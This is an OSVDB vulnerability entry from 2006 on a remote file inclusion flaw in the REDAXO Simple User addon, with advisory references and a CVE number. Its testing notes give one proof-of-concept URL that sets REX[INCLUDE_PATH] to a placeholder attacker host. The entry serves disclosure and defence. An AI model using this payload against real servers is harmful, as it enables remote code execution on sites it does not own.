REDAXO Simple User Addon index.inc.php REX[INCLUDE_PATH] Variable Remote File Inclusion

2006-06-01T09:05:16
ID OSVDB:25956
Type osvdb
Reporter OSVDB
Modified 2006-06-01T09:05:16

Description

Manual Testing Notes

./redaxo3_0_demos_patched/redaxo/include/addons/simple_user/pages/index.inc.php?REX[INCLUDE_PATH]=attacker

References:

Vendor URL: http://www.redaxo.de/ Secunia Advisory ID:20395 Related OSVDB ID: 25959 Related OSVDB ID: 25955 Related OSVDB ID: 25957 Related OSVDB ID: 25958 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0730.html Generic Exploit URL: http://milw0rm.com/exploits/1861 FrSIRT Advisory: ADV-2006-2109 CVE-2006-2844